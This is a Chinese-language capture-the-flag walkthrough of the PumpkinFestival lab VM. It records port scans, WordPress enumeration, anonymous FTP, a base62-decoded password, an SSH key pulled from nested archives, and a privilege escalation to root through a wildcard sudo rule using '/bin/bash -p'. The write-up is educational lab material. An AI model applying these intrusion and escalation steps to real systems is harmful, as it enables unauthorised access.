PumpkinFestival 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.140      
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-10 02:47 EDT
Nmap scan report for pumpkins.local (192.168.56.140)
Host is up (0.00016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
6880/tcp open  unknown
MAC Address: 08:00:27:FA:92:8E (Oracle VirtualBox virtual NIC)

开放了 21, 80, 6880 端口

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ sudo nmap -sT -sV -sC -O -p21,80,6880 192.168.56.140
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-10 02:49 EDT
Nmap scan report for pumpkins.local (192.168.56.140)
Host is up (0.00046s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Jul 12  2019 secret
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Pumpkin Festival – PumpkinToken : 06c3eb12ef2389e2752335...
|_http-generator: WordPress 4.9.3
6880/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 eb:cb:da:b3:be:b6:c8:0a:8b:6e:d5:bc:51:f7:9c:11 (DSA)
|   2048 19:6b:6e:d3:8a:fa:a9:73:05:5e:ac:af:28:ff:55:b8 (RSA)
|   256 00:a0:f2:8c:5e:a7:7e:7b:7b:d4:72:c3:ad:41:79:3b (ECDSA)
|_  256 aa:04:61:9a:ca:19:90:c3:55:3c:fc:cc:1a:05:be:3f (ED25519)
MAC Address: 08:00:27:FA:92:8E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

21 端口允许匿名登陆，80 端口是 Apache 搭建的服务，title 中包含了 PumpkinToken，WordPress 4.9.3，操作系统是 Ubuntu。接下来 nmap 漏扫的同时去 ftp 看看文件。

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ ftp 192.168.56.140
Connected to 192.168.56.140.
220 Welcome to Pumpkin\'s FTP service.
Name (192.168.56.140:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||28051|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 12  2019 secret
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> binary
200 Switching to Binary mode.
ftp> cd secret
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||57147|).
150 Here comes the directory listing.
-rw-r--r--    1 0        0              48 Jul 12  2019 token.txt
226 Directory send OK.

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ cat token.txt 
PumpkinToken : 2d6dbbae84d724409606eddd9dd71265
# 第一个PumpkinToken

拿到了一个PumpkinToken

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ sudo nmap --script=vuln -p21,80,6880 192.168.56.140
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-10 02:50 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for pumpkins.local (192.168.56.140)
Host is up (0.00046s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server\'s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /: WordPress version: 4.9.3
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
6880/tcp open  unknown
MAC Address: 08:00:27:FA:92:8E (Oracle VirtualBox virtual NIC)

nmap 漏扫显示了一些 wordpress 的路径和文件。

Web 查看

PumpkinTokens can help you get to your pumpkins. 可能是在暗示 PumpkinTokens 的值是密码。不过获得的 PumpkinTokens 有点多啊。同时在这里发现了两个用户名 jack, harry

观察源代码发现

PumpkinToken : 45d9ee7239bc6b0bb21d3f8e1c5faa52
# 第二个PumpkinToken

不过 nmap 扫出来的标题中也带有 PumpkinToken，这里查看源代码并没有发现

目录爆破

目录爆破一下

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ sudo dirsearch -u http://192.168.56.140/           
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.140/-_23-09-10_03-08-01.txt

Error Log: /root/.dirsearch/logs/errors-23-09-10_03-08-01.log

Target: http://192.168.56.140/

[03:08:01] Starting: 
[03:08:02] 403 -  292B  - /.ht_wsr.txt                                     
[03:08:02] 403 -  295B  - /.htaccess.bak1
[03:08:02] 403 -  297B  - /.htaccess.sample
[03:08:02] 403 -  295B  - /.htaccess.orig
[03:08:02] 403 -  295B  - /.htaccess_orig
[03:08:02] 403 -  296B  - /.htaccess_extra
[03:08:02] 403 -  293B  - /.htaccess_sc
[03:08:02] 403 -  294B  - /.htaccessOLD2
[03:08:02] 403 -  295B  - /.htaccess.save
[03:08:02] 403 -  293B  - /.htaccessOLD
[03:08:02] 403 -  285B  - /.htm
[03:08:02] 403 -  286B  - /.html
[03:08:02] 403 -  293B  - /.htaccessBAK                                    
[03:08:02] 403 -  295B  - /.htpasswd_test
[03:08:02] 403 -  292B  - /.httr-oauth
[03:08:02] 403 -  291B  - /.htpasswds
[03:08:03] 403 -  285B  - /.php                                            
[03:08:03] 403 -  286B  - /.php3                                           
[03:08:21] 301 -  313B  - /img  ->  http://192.168.56.140/img/              
[03:08:21] 200 -    1KB - /index.html                                       
[03:08:30] 200 -  102B  - /robots.txt                                       
[03:08:31] 403 -  294B  - /server-status                                    
[03:08:31] 403 -  295B  - /server-status/                                   
[03:08:33] 301 -  315B  - /store  ->  http://192.168.56.140/store/          
[03:08:35] 301 -  315B  - /users  ->  http://192.168.56.140/users/          
[03:08:35] 403 -  287B  - /users/

robots.txt 中的内容如下

User-agent: * 
Disallow: /wordpress/
Disallow: /tokens/
Disallow: /users/
Disallow: /store/track.txt

访问发现只有 /store/track.txt 可以访问，tokens 和 users 返回 403，wordpress 返回 404。/store/track.txt 的内容如下

Hey Jack!

Thanks for choosing our local store. Hope you like the services.
Tracking code : 2542 8231 6783 486

-Regards 
admin@pumpkins.local

tracking code 不知道怎么利用，先记录下来，这里的邮箱后缀有点意思，感觉可能是这个网站的域名。在 hosts 文件中添加此域名和 IP 的映射。再访问此域名

有意思，这里又拿到了一个，而且就是 nmap 扫描结果中的那个PumpkinToken

PumpkinToken : 06c3eb12ef2389e2752335beccfb2080
# 第三个PumpkinToken

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ sudo dirsearch -u http://pumpkins.local/

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/pumpkins.local/-_23-09-10_03-16-02.txt

Error Log: /root/.dirsearch/logs/errors-23-09-10_03-16-02.log

Target: http://pumpkins.local/

[03:16:02] Starting: 
[03:16:04] 403 -  292B  - /.ht_wsr.txt                                     
[03:16:04] 403 -  295B  - /.htaccess.bak1
[03:16:04] 403 -  297B  - /.htaccess.sample
[03:16:04] 403 -  295B  - /.htaccess.save
[03:16:04] 403 -  295B  - /.htaccess_orig
[03:16:04] 403 -  293B  - /.htaccessBAK
[03:16:04] 403 -  293B  - /.htaccess_sc
[03:16:04] 403 -  294B  - /.htaccessOLD2
[03:16:04] 403 -  295B  - /.htaccess.orig
[03:16:04] 403 -  293B  - /.htaccessOLD
[03:16:04] 403 -  286B  - /.html                                           
[03:16:04] 403 -  296B  - /.htaccess_extra
[03:16:04] 403 -  285B  - /.htm
[03:16:04] 403 -  291B  - /.htpasswds
[03:16:04] 403 -  295B  - /.htpasswd_test
[03:16:04] 403 -  292B  - /.httr-oauth                                     
[03:16:05] 403 -  285B  - /.php                                            
[03:16:05] 403 -  286B  - /.php3
[03:16:24] 301 -    0B  - /index.php  ->  http://pumpkins.local/            
[03:16:24] 301 -    0B  - /index.php/login/  ->  http://pumpkins.local/login/
[03:16:25] 200 -   20KB - /license.txt                                      
[03:16:32] 200 -  642B  - /readme.html                                      
[03:16:33] 403 -  295B  - /server-status/                                   
[03:16:33] 403 -  294B  - /server-status
[03:16:40] 301 -  318B  - /wp-admin  ->  http://pumpkins.local/wp-admin/    
[03:16:40] 200 -    0B  - /wp-content/                                      
[03:16:40] 302 -    0B  - /wp-admin/  ->  http://pumpkins.local/wp-login.php?redirect_to=http%3A%2F%2Fpumpkins.local%2Fwp-admin%2F&reauth=1
[03:16:40] 301 -  320B  - /wp-content  ->  http://pumpkins.local/wp-content/
[03:16:40] 400 -    1B  - /wp-admin/admin-ajax.php                          
[03:16:40] 500 -    3KB - /wp-admin/setup-config.php
[03:16:40] 200 -    0B  - /wp-config.php                                    
[03:16:40] 200 -    1KB - /wp-admin/install.php                             
[03:16:40] 403 -  317B  - /wp-content/plugins/akismet/admin.php             
[03:16:40] 403 -  319B  - /wp-content/plugins/akismet/akismet.php           
[03:16:40] 500 -    0B  - /wp-content/plugins/hello.php                     
[03:16:40] 200 -  967B  - /wp-content/uploads/                              
[03:16:40] 301 -  321B  - /wp-includes  ->  http://pumpkins.local/wp-includes/
[03:16:40] 500 -    0B  - /wp-includes/rss-functions.php                    
[03:16:40] 200 -    0B  - /wp-cron.php                                      
[03:16:40] 200 -   40KB - /wp-includes/                                     
[03:16:40] 200 -    2KB - /wp-login.php                                     
[03:16:40] 302 -    0B  - /wp-signup.php  ->  http://pumpkins.local/wp-login.php?action=register
[03:16:40] 405 -   42B  - /xmlrpc.php                                       
                                                                             
Task Completed

依次查看

又一个

PumpkinToken : 5ff346114d634a015ce413e1bc3d8d71
# 第四个PumpkinToken

readme.html 的返回有点奇怪，没有 PumpkinToken 的提示，先记录下来吧

uploads 目录里只是一张图片，是 wordpress 的常见路径。以防万一下载到本地查看了一下，应该没有隐写

/wp-includes/ 中也是一些文件，但是没有发现隐藏的PumpkinToken

目录爆破的结果中有注册页面，尝试注册，但是这并不是一个真实网站，邮箱收不到注册邮件。既然是 wordpress 网站，wpscan 试试吧

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ wpscan --url http://pumpkins.local/ -e ap,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | \_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://pumpkins.local/ [192.168.56.140]
[+] Started: Sun Sep 10 03:24:14 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.7 (Ubuntu)
 |  - X-Powered-By: PHP/5.5.9-1ubuntu4.29
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://pumpkins.local/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://pumpkins.local/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Registration is enabled: http://pumpkins.local/wp-login.php?action=register
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://pumpkins.local/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://pumpkins.local/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.3 identified (Insecure, released on 2018-02-05).
 | Found By: Rss Generator (Passive Detection)
 |  - http://pumpkins.local/?feed=rss2, <generator>https://wordpress.org/?v=4.9.3</generator>
 |  - http://pumpkins.local/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.9.3</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://pumpkins.local/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://pumpkins.local/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://pumpkins.local/wp-content/themes/twentyseventeen/style.css?ver=4.9.3
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://pumpkins.local/wp-content/themes/twentyseventeen/style.css?ver=4.9.3, Match: \'Version: 1.4\'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] morse
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] loly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] loly2
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

loly 和 loly2 是我注册的用户名，这里得到了 admin 和 morse 两个用户名。

base62 编码

在这里卡了很久，有的时候不只是场景的熟悉度，脑子也得够灵活才能应对。看似我这里已经尽己所能了（除了爆破，尝试了用几个收集到的用户名，常用的 10000 个密码来爆破，没得到结果，使用 rockyou.txt 爆破了一晚上也没跑完）。这里的第一个关键是 readme.html

K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s

尽管我也尝试了将其作为密码来爆破登录，无论是 ftp 还是 wordpress，但是都没收获。实际上关于这串字符串，常规的解码都得不到答案，但令我受挫的是我没有合理地这串字符串的价值做出判断，只是简单地考虑将其作为密码，虽然也将 PumpkinToken 也作为密码来爆破尝试，不过无效功还是太多。

通过 From Base62 - CyberChef (gchq.github.io) 工具来不断尝试不同的解码方式解密成功

我们拿到了用户名和密码的两对映射，尝试 ssh 登录的时候发现这台机器并不支持 ssh 密码登录，应该是只能通过密钥来登录

-----------------------------------------------------------------------
                          Welcome to Mission-Pumpkin
      All remote connections to this machine are monitored and recorded
-----------------------------------------------------------------------

jack@192.168.56.140: Permission denied (publickey).

如何获取 ssh 密钥，就需要继续之前提到过的忽略的关键点了。不过我们看到这里还有个 morse 用户名，这和 wpscan 扫描结果中的用户是一致的，我们尝试登录 wordpress 后台看看

morse:Ug0t!TrIpyJ 登录成功，不过用户权限有限，而 admin 的密码并不是这个，翻来翻去只在 Profile 中找到了一个 PumpkinToken。继续看如何获取 ssh 密钥吧。

PumpkinToken : 7139e925fd43618653e51f820bc6201b
# 第五个PumpkinToken

FTP 爆破

第二个关键点是 ftp 爆破的问题，这个点确实……如果接下来有台靶机也是这个尿性，我估计还会卡在这里。没办法，爆破字典如果选太大的，爆破时间太久，爆破字典太小又没有结果，自己制作的字典也不一定有效。

这里靶机制作者把密码放在了 rockyou 里靠后的部分，爆破时间真的长。

直接在 WP 里看了密码 yrrah

ftp 登录

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ ftp 192.168.56.140
Connected to 192.168.56.140.
220 Welcome to Pumpkin\'s FTP service.
Name (192.168.56.140:kali): harry
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls -alih
229 Entering Extended Passive Mode (|||24552|).
150 Here comes the directory listing.
drwx------    3 1002     1002         4096 Jul 15  2019 .
drwxr-xr-x    5 0        0            4096 Jul 12  2019 ..
-rw-------    1 1002     1002            8 Jul 15  2019 .bash_history
-rw-r--r--    1 1002     1002          220 Jul 12  2019 .bash_logout
-rw-r--r--    1 1002     1002         3637 Jul 12  2019 .bashrc
-rw-r--r--    1 1002     1002          675 Jul 12  2019 .profile
drwxr-xr-x    3 0        0            4096 Jul 12  2019 Donotopen
-rw-r--r--    1 0        0              48 Jul 12  2019 token.txt
226 Directory send OK.

依次查看 .bash_history, token.txt, Donotopen

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ cat .bash_history                                                                       
ls
exit

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ cat token.txt
PumpkinToken : ba9fa9abf2be9373b7cbd9a6457f374e
# 第六个PumpkinToken

Donotopen 是一个目录，不断进去，发现有个文件和一个目录，先把文件下载到本地查看，再进另一个文件查看

48 bytes received in 00:00 (17.32 KiB/s)
ftp> pwd
Remote directory: /home/harry/Donotopen/NO/NOO/NOOO/NOOOO
ftp> ls
229 Entering Extended Passive Mode (|||46745|).
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Jul 14  2019 NOOOOO
-rw-r--r--    1 0        0              48 Jul 12  2019 token.txt
226 Directory send OK.
ftp> cd NOOOOO
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||52087|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 14  2019 NOOOOOO
226 Directory send OK.
ftp> cd NOOOOOO
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||29574|).
150 Here comes the directory listing.
-rw-r--r--    1 0        0            4357 Jul 14  2019 data.txt
226 Directory send OK.
ftp> get data.txt
local: data.txt remote: data.txt
229 Entering Extended Passive Mode (|||61794|).
150 Opening BINARY mode data connection for data.txt (4357 bytes).
100% |***********************************************************************|  4357        2.03 MiB/s    00:00 ETA
226 Transfer complete.
4357 bytes received in 00:00 (1.60 MiB/s)

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ cat token.txt
PumpkinToken : f9c5053d01e0dfc30066476ab0f0564c
# 第七个PumpkinToken

文件内容里的十六进制

data.txt 的情况比较复杂，问问 chatgpt

这方面还是得看它啊

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ cp data.txt data.tar                          
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ tar -xvf data.tar 
data
tar: A lone zero block at 8

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ file data         
data: bzip2 compressed data, block size = 900k

竟然还是压缩文件，再来

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ tar -xvf data    
key
tar: A lone zero block at 25

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ file key 
key: POSIX tar archive

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ tar -xvf key 
jack
tar: A lone zero block at 22

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ file jack
jack: ASCII text, with very long lines (10106), with no line terminators

jack 虽然是文本文件，但是文件内容是十六进制的文本文件，接下来考虑如何将其转换，这里先偷懒用CyberChef

ssh 私钥登录

发现竟然就是我们想要的私钥，将其写入文件，使用密钥登录

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ xxd -r -ps jack  > jack.bin

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ strings jack.bin > sshlogin 

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ chmod 600 sshlogin  

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ ssh -i sshlogin jack@192.168.56.140 -p6880 
-----------------------------------------------------------------------
                          Welcome to Mission-Pumpkin
      All remote connections to this machine are monitored and recorded
-----------------------------------------------------------------------
jack@192.168.56.140: Permission denied (publickey).

不知道为什么还是报错，加上-vv 参数看看

找到了原因，还是经典的问题，加上参数继续

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ ssh -i jackkey.key jack@192.168.56.140 -p 6880 -oPubkeyAcceptedKeyTypes=+ssh-rsa 
------------------------------------------------------------------------------
                          Welcome to Mission-Pumpkin
      All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------

Last login: Tue Jul 16 08:12:07 2019 from 192.168.1.105
-bash: /home/jack/.bash_profile: Permission denied
jack@pumpkin:~$ whoami
jack
jack@pumpkin:~$ id
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
jack@pumpkin:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:fa:92:8e brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.140/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fefa:928e/64 scope link 
       valid_lft forever preferred_lft forever
jack@pumpkin:~$ sudo -l
[sudo] password for jack: 
Matching Defaults entries for jack on pumpkin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jack may run the following commands on pumpkin:
    (ALL) /home/jack/pumpkins/alohomora*

构建同名文件 sudo 权限提权

sudo -l 使用的是 wordpress 的密码 Ug0t!TrIpyJ，给的路径是不存在的，所以我们可以尝试自己构建一个该路径下的文件

其实这里的*是通配符，构建的文件名可以直接为alohomora

jack@pumpkin:~$ mkdir pumpkins
jack@pumpkin:~$ cd pumpkins/
jack@pumpkin:~/pumpkins$ echo "/bin/bash -p" >alohomora*
jack@pumpkin:~/pumpkins$ ls
alohomora*
jack@pumpkin:~/pumpkins$ sudo /home/jack/pumpkins/alohomora*
sudo: /home/jack/pumpkins/alohomora*: command not found
jack@pumpkin:~/pumpkins$ chmod +x alohomora\* 
jack@pumpkin:~/pumpkins$ sudo /home/jack/pumpkins/alohomora*
root@pumpkin:~/pumpkins# cd /root
root@pumpkin:/root# ls
PumpkinFestival_Ticket
root@pumpkin:/root# ls -alih
total 36K
131254 drwx------  3 root root 4.0K Jul 16  2019 .
     2 drwxr-xr-x 22 root root 4.0K Jul 12  2019 ..
169504 -rw-r--r--  1 root root   55 Jul 15  2019 .bash_logout
131227 -rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
 21326 drwx------  2 root root 4.0K Jul 12  2019 .cache
131282 -rw-------  1 root root  369 Jul 13  2019 .mysql_history
171922 -rw-------  1 root root   89 Jul 16  2019 .nano_history
131226 -rw-r--r--  1 root root  140 Feb 20  2014 .profile
131259 -rw-r--r--  1 root root 1.7K Jul 15  2019 PumpkinFestival_Ticket
root@pumpkin:/root# cat PumpkinFestival_Ticket
------------------------------------------------------------
                        Yippeeeee!
  Congratulations on successfully rooting this machine.

                          ooo
                         $ o$
                        o $$
              ""$$$    o" $$ oo "
          " o$"$oo$$$"o$$o$$"$$$$$ o
         $" "o$$$$$$o$$$$$$$$$$$$$$o     o
      o$"    "$$$$$$$$$$$$$$$$$$$$$$o" "oo  o
     " "     o  "$$$o   o$$$$$$$$$$$oo$$
    " $     " "o$$$$$ $$$$$$$$$$$"$$$$$$$o
  o  $       o o$$$$$"$$$$$$$$$$$o$$"""$$$$o " "
 o          o$$$$$"    "$$$$$$$$$$ "" oo $$   o $
 $  $       $$$$$  $$$oo "$$$$$$$$o o $$$o$$oo o o
o        o $$$$$oo$$$$$$o$$$$ ""$$oo$$$$$$$$"  " "o
"   o    $ ""$$$$$$$$$$$$$$  o  "$$$$$$$$$$$$   o "
"   $      "$$$$$$$$$$$$$$   "   $$$"$$$$$$$$o  o
$   o      o$"""""$$$$$$$$    oooo$$ $$$$$$$$"  "
$      o""o $$o    $$$$$$$$$$$$$$$$$ ""  o$$$   $ o
 o     " "o "$$$$  $$$$$""""""""""" $  o$$$$$"" o o
 "  " o  o$o" $$$$o   ""           o  o$$$$$"   o
  $         o$$$$$$$oo            "oo$$$$$$$"    o
  "$   o o$o $o o$$$$$"$$$$oooo$$$$$$$$$$$$$$"o$o
    "o oo  $o$"oo$$$$$o$$$$$$$$$$$$"$$$$$$$$"o$"
     "$ooo $$o$   $$$$$$$$$$$$$$$$ $$$$$$$$o"
        "" $$$$$$$$$$$$$$$$$$$$$$" """"
                         """"""
      There were 10 PumpkinTokens on this VM

------------------------------------------------------------
    Love to know your thoughts and suggestions
              Tweet me @askjayanth
------------------------------------------------------------
     
  Eagerly waiting to see your detailed walk-throughs
            Level 1 : PumpkinGarden
            Level 2 : PumpkinRaising
            Level 3 : PumpkinFestival

  Until next time, Mission-Pumpkin v1.0 signing off...


root@pumpkin:/root# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:fa:92:8e brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.140/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fefa:928e/64 scope link 
       valid_lft forever preferred_lft forever
root@pumpkin:/root# uname -a
Linux pumpkin 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
root@pumpkin:/root# whoami
root

提权成功，拿到了 flag

不过这里提示说一共有十个PumpkinToken

jack@pumpkin:~$ ls -liah
total 52K
 21273 drwx------ 5 jack jack 4.0K Sep 12 13:40 .
  8199 drwxr-xr-x 5 root root 4.0K Jul 12  2019 ..
 23336 -rw------- 1 root root   74 Sep 12 13:40 .bash_history
 21276 -rw-r--r-- 1 jack jack  231 Jul 15  2019 .bash_logout
 21285 -rw------- 1 root root   94 Jul 16  2019 .bash_profile
 21275 -rw-r--r-- 1 jack jack 3.6K Jul 15  2019 .bashrc
 21319 drwx------ 2 jack jack 4.0K Jul 12  2019 .cache
 21274 -rw-r--r-- 1 jack jack  675 Jul 12  2019 .profile
 23207 drwxrwxr-x 2 jack jack 4.0K Sep 12 13:34 pumpkins
 22986 drwxrwxr-x 2 jack jack 4.0K Jul 12  2019 .ssh
175806 -rwsr-xr-x 1 root root  11K Jul 15  2019 token
jack@pumpkin:~$ file token
